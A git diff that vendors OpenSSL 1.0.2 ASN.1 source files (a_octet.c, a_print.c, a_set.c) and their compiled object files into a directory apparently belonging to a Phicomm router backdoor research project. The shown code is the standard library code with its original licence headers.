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

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_octet.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_octet.c
new file mode 100644
index 0000000..1a6e9ca
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_octet.c
@@ -0,0 +1,78 @@
+/* crypto/asn1/a_octet.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/asn1.h>
+
+ASN1_OCTET_STRING *ASN1_OCTET_STRING_dup(const ASN1_OCTET_STRING *x)
+{
+    return M_ASN1_OCTET_STRING_dup(x);
+}
+
+int ASN1_OCTET_STRING_cmp(const ASN1_OCTET_STRING *a,
+                          const ASN1_OCTET_STRING *b)
+{
+    return M_ASN1_OCTET_STRING_cmp(a, b);
+}
+
+int ASN1_OCTET_STRING_set(ASN1_OCTET_STRING *x, const unsigned char *d,
+                          int len)
+{
+    return M_ASN1_OCTET_STRING_set(x, d, len);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_octet.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_octet.o
new file mode 100644
index 0000000000000000000000000000000000000000..405983e188e4a9f446947656a931ddcc8e860a24
GIT binary patch
literal 1880
zcmbtUQEL-H5T0wQt=igJ1OpX`FQRCdL<_|}NYa=@B_z<KAV@hc>1n}U5^{Uc`k)0t
zd=&f>{TcopAH_Ej>dfBGWp8tN(Sf^}`S$x}_hxtRW35@Aa~xoE;0a7JMgj8klenzH
zGAzRq{93v7`v>LI0W_-B?ZVx?UNn$V;jwrmiW{Y^NTsC@4~wF>c`t@hPUTnexqwfj
zwFh$m-wDg%Lv}rO;Jn`j=XljwUs_oFiVG#pO+9u=d%}tqM*61~rqfJEJ(!1|=UIcf
z%ns37d9`U(PJLY(qbvs(r$L1;%)l3C;MBFWUBPtCSSR=9HsaJD+qMwM!W)QF9oDno
zpTQ3_e+@ku^FLvnRUbTe*q6Q(eW-L=CAVGe*1B$|yZgM=a1WvpxQ%9er_yxW^?C<K
zx|N+~&5gMRYg*e6Mk!X3r)CI!nPO3{j5|takb3#&JhrRxu-egO1HWP5D+XTBIG$%Z
z(}`{Bh;i=IGYjWFf(TCn>GjadaqJH{8v93{kp8g*ao|Z0L@x|M^oK#<4-gv+r7!SK
zZG_V6ztj2KK_o`w;m9A$6A-F`f9Sp$dx4*<@qdB>is=s7C%lXp*?R1fH*rm)aq4~9
z1ToI*E5?1gj2LP8X5=;hj>hd9`AU!5&Yu4P5~$|C>Px7ln*1NaP#MpEp8@T8e)ijl
zb8J#Sn~4$I+!r`Te-ZP{5&a9j&<g53d2#<3>0v-MZT*=hykw&Gwx0eES^M`oWB*9Y
xdfvaRxz$wqLr=A*yGeJ)))Qv$9qCW?2YsW&FkLP|u3?m=Khxk*!i)o3{}<(PmGuAs

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_print.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_print.c
new file mode 100644
index 0000000..d83e4ad
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_print.c
@@ -0,0 +1,129 @@
+/* crypto/asn1/a_print.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/asn1.h>
+
+int ASN1_PRINTABLE_type(const unsigned char *s, int len)
+{
+    int c;
+    int ia5 = 0;
+    int t61 = 0;
+
+    if (len <= 0)
+        len = -1;
+    if (s == NULL)
+        return (V_ASN1_PRINTABLESTRING);
+
+    while ((*s) && (len-- != 0)) {
+        c = *(s++);
+#ifndef CHARSET_EBCDIC
+        if (!(((c >= 'a') && (c <= 'z')) ||
+              ((c >= 'A') && (c <= 'Z')) ||
+              (c == ' ') ||
+              ((c >= '0') && (c <= '9')) ||
+              (c == ' ') || (c == '\'') ||
+              (c == '(') || (c == ')') ||
+              (c == '+') || (c == ',') ||
+              (c == '-') || (c == '.') ||
+              (c == '/') || (c == ':') || (c == '=') || (c == '?')))
+            ia5 = 1;
+        if (c & 0x80)
+            t61 = 1;
+#else
+        if (!isalnum(c) && (c != ' ') && strchr("'()+,-./:=?", c) == NULL)
+            ia5 = 1;
+        if (os_toascii[c] & 0x80)
+            t61 = 1;
+#endif
+    }
+    if (t61)
+        return (V_ASN1_T61STRING);
+    if (ia5)
+        return (V_ASN1_IA5STRING);
+    return (V_ASN1_PRINTABLESTRING);
+}
+
+int ASN1_UNIVERSALSTRING_to_string(ASN1_UNIVERSALSTRING *s)
+{
+    int i;
+    unsigned char *p;
+
+    if (s->type != V_ASN1_UNIVERSALSTRING)
+        return (0);
+    if ((s->length % 4) != 0)
+        return (0);
+    p = s->data;
+    for (i = 0; i < s->length; i += 4) {
+        if ((p[0] != '\0') || (p[1] != '\0') || (p[2] != '\0'))
+            break;
+        else
+            p += 4;
+    }
+    if (i < s->length)
+        return (0);
+    p = s->data;
+    for (i = 3; i < s->length; i += 4) {
+        *(p++) = s->data[i];
+    }
+    *(p) = '\0';
+    s->length /= 4;
+    s->type = ASN1_PRINTABLE_type(s->data, s->length);
+    return (1);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_print.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_print.o
new file mode 100644
index 0000000000000000000000000000000000000000..04aeb4b98824a2c749852edf641ee9918e4f9f64
GIT binary patch
literal 1880
zcmbu8O-vI(6o6;j3RTb+@dt!xy%>$M=_-kV5NstYi~Ph;Fh*i(iv^5OYC9W24b*H&
zti5<MdeNJD^WXvTQfWfOgHgPgcn}j0m|pxzKt!$YZD*jY<)SZ{eeZoU@6DSxv!im$
zF_Rz=E&{11D;}qWlv!46mu|YqMp8_^*>?UIn;$i6FEit%z?HF#Ep`VCX(m1|OVhHH
zyivT}J%Kr!o?_s&rOf@<v|2R21sr*7n)*{p%~$%_6MwGFzSrj5b>)u)+pSb|@yMm(
zmiSxc&789EN}Cm8?`T0RDcj`9*tBd@UMQJKNDZmVcq(<PTl+4QC$-sMT5?;u5b~-I
z(;vE0xj2==nx&*RYN=Eso`g+_FU>zQt367h(JIZ<ydK#Rt+NxgBYM>?5Vcj&CM{t8
zCiG+4HDQLLYf48-l|-{u$-vo4aQ?cINq?FmBw>DneNqxvthW~y<L3C(9JnOjU>U~-
zq)k$?E0rRR4Gp!9y`6qFNL5FTct~_sNrzS4l|~LaMQ8QCEG7ig*<q}M(b(2WOoSwn
zVI3&gL=@q2I}wKLLPc?*^(O392@D6yWBiz!H`z6l>GUS6I|VMz)gcFo;-^)gzR0GL
z<P|)Ig?!26n>6QrIan*Nc6F3lKiz7Eo|zQ<4Rv0)2Dh%kv1_ZP2;9v%b?UtVwu^D@
zN5R*{=M9C=2dUUi+@3bcd!oImt;2n^MfTF+P$0`X+nP?w?H+fFrvqjiy>!qUp%Byy
z33g+{K=97i!}yuWiUVvExKDlP4t!k9;GEY(#K`af_4z^5a8~zmD;((ei8L@oiFnRO
zeMIy}B1G&S92f`$fdvO?K!mqb6`{WF3(W5gs$wWS7z%{xFcI|(fj)0f*f$X1rTmw6
zKr|lRc#|$*DAlYlSueYm+o&sGV9#7Ia^)<0N@Wag0F9~m3*dYY<Hnaq4g0b*IWHnh
z4zQg68ZWW^oqPkP`TqM2oR`IQEsHlSBX{`%!-NqZhk5*4@EzsKJ+{!13&H07<Jb=d
zE;Ys{S^O!!kZEK58Q}TuZ-_ON_XY0{V|hHkzkGY+R%NUpE2{(lXZ){>@yLvK2Z%Tr
ZtVbtDSh{6W0#?5G2MqQvugn_8_&-ht>y`ij

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_set.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_set.c
new file mode 100644
index 0000000..bf3f971
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_set.c
@@ -0,0 +1,238 @@
+/* crypto/asn1/a_set.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/asn1_mac.h>
+
+#ifndef NO_ASN1_OLD
+
+typedef struct {
+    unsigned char *pbData;
+    int cbData;
+} MYBLOB;
+
+/*
+ * SetBlobCmp This function compares two elements of SET_OF block
+ */
+static int SetBlobCmp(const void *elem1, const void *elem2)
+{
+    const MYBLOB *b1 = (const MYBLOB *)elem1;
+    const MYBLOB *b2 = (const MYBLOB *)elem2;
+    int r;
+
+    r = memcmp(b1->pbData, b2->pbData,
+               b1->cbData < b2->cbData ? b1->cbData : b2->cbData);
+    if (r != 0)
+        return r;
+    return b1->cbData - b2->cbData;
+}
+
+/*
+ * int is_set: if TRUE, then sort the contents (i.e. it isn't a SEQUENCE)
+ */
+int i2d_ASN1_SET(STACK_OF(OPENSSL_BLOCK) *a, unsigned char **pp,
+                 i2d_of_void *i2d, int ex_tag, int ex_class, int is_set)
+{
+    int ret = 0, r;
+    int i;
+    unsigned char *p;
+    unsigned char *pStart, *pTempMem;
+    MYBLOB *rgSetBlob;
+    int totSize;
+
+    if (a == NULL)
+        return (0);
+    for (i = sk_OPENSSL_BLOCK_num(a) - 1; i >= 0; i--)
+        ret += i2d(sk_OPENSSL_BLOCK_value(a, i), NULL);
+    r = ASN1_object_size(1, ret, ex_tag);
+    if (pp == NULL)
+        return (r);
+
+    p = *pp;
+    ASN1_put_object(&p, 1, ret, ex_tag, ex_class);
+
+/* Modified by gp@nsj.co.jp */
+    /* And then again by Ben */
+    /* And again by Steve */
+
+    if (!is_set || (sk_OPENSSL_BLOCK_num(a) < 2)) {
+        for (i = 0; i < sk_OPENSSL_BLOCK_num(a); i++)
+            i2d(sk_OPENSSL_BLOCK_value(a, i), &p);
+
+        *pp = p;
+        return (r);
+    }
+
+    pStart = p;                 /* Catch the beg of Setblobs */
+    /* In this array we will store the SET blobs */
+    rgSetBlob = OPENSSL_malloc(sk_OPENSSL_BLOCK_num(a) * sizeof(MYBLOB));
+    if (rgSetBlob == NULL) {
+        ASN1err(ASN1_F_I2D_ASN1_SET, ERR_R_MALLOC_FAILURE);
+        return (0);
+    }
+
+    for (i = 0; i < sk_OPENSSL_BLOCK_num(a); i++) {
+        rgSetBlob[i].pbData = p; /* catch each set encode blob */
+        i2d(sk_OPENSSL_BLOCK_value(a, i), &p);
+        rgSetBlob[i].cbData = p - rgSetBlob[i].pbData; /* Length of this
+                                                        * SetBlob */
+    }
+    *pp = p;
+    totSize = p - pStart;       /* This is the total size of all set blobs */
+
+    /*
+     * Now we have to sort the blobs. I am using a simple algo. *Sort ptrs
+     * *Copy to temp-mem *Copy from temp-mem to user-mem
+     */
+    qsort(rgSetBlob, sk_OPENSSL_BLOCK_num(a), sizeof(MYBLOB), SetBlobCmp);
+    if (!(pTempMem = OPENSSL_malloc(totSize))) {
+        ASN1err(ASN1_F_I2D_ASN1_SET, ERR_R_MALLOC_FAILURE);
+        return (0);
+    }
+
+/* Copy to temp mem */
+    p = pTempMem;
+    for (i = 0; i < sk_OPENSSL_BLOCK_num(a); ++i) {
+        memcpy(p, rgSetBlob[i].pbData, rgSetBlob[i].cbData);
+        p += rgSetBlob[i].cbData;
+    }
+
+/* Copy back to user mem*/
+    memcpy(pStart, pTempMem, totSize);
+    OPENSSL_free(pTempMem);
+    OPENSSL_free(rgSetBlob);
+
+    return (r);
+}
+
+STACK_OF(OPENSSL_BLOCK) *d2i_ASN1_SET(STACK_OF(OPENSSL_BLOCK) **a,
+                                      const unsigned char **pp,
+                                      long length, d2i_of_void *d2i,
+                                      void (*free_func) (OPENSSL_BLOCK),
+                                      int ex_tag, int ex_class)
+{
+    ASN1_const_CTX c;
+    STACK_OF(OPENSSL_BLOCK) *ret = NULL;
+
+    if ((a == NULL) || ((*a) == NULL)) {
+        if ((ret = sk_OPENSSL_BLOCK_new_null()) == NULL) {
+            ASN1err(ASN1_F_D2I_ASN1_SET, ERR_R_MALLOC_FAILURE);
+            goto err;
+        }
+    } else
+        ret = (*a);
+
+    c.p = *pp;
+    c.max = (length == 0) ? 0 : (c.p + length);
+
+    c.inf = ASN1_get_object(&c.p, &c.slen, &c.tag, &c.xclass, c.max - c.p);
+    if (c.inf & 0x80)
+        goto err;
+    if (ex_class != c.xclass) {
+        ASN1err(ASN1_F_D2I_ASN1_SET, ASN1_R_BAD_CLASS);
+        goto err;
+    }
+    if (ex_tag != c.tag) {
+        ASN1err(ASN1_F_D2I_ASN1_SET, ASN1_R_BAD_TAG);
+        goto err;
+    }
+    if ((c.slen + c.p) > c.max) {
+        ASN1err(ASN1_F_D2I_ASN1_SET, ASN1_R_LENGTH_ERROR);
+        goto err;
+    }
+    /*
+     * check for infinite constructed - it can be as long as the amount of
+     * data passed to us
+     */
+    if (c.inf == (V_ASN1_CONSTRUCTED + 1))
+        c.slen = length + *pp - c.p;
+    c.max = c.p + c.slen;
+
+    while (c.p < c.max) {
+        char *s;
+
+        if (M_ASN1_D2I_end_sequence())
+            break;
+        /*
+         * XXX: This was called with 4 arguments, incorrectly, it seems if
+         * ((s=func(NULL,&c.p,c.slen,c.max-c.p)) == NULL)
+         */
+        if ((s = d2i(NULL, &c.p, c.slen)) == NULL) {
+            ASN1err(ASN1_F_D2I_ASN1_SET, ASN1_R_ERROR_PARSING_SET_ELEMENT);
+            asn1_add_error(*pp, (int)(c.p - *pp));
+            goto err;
+        }
+        if (!sk_OPENSSL_BLOCK_push(ret, s))
+            goto err;
+    }
+    if (a != NULL)
+        (*a) = ret;
+    *pp = c.p;
+    return (ret);
+ err:
+    if ((ret != NULL) && ((a == NULL) || (*a != ret))) {
+        if (free_func != NULL)
+            sk_OPENSSL_BLOCK_pop_free(ret, free_func);
+        else
+            sk_OPENSSL_BLOCK_free(ret);
+    }
+    return (NULL);
+}
+
+#endif
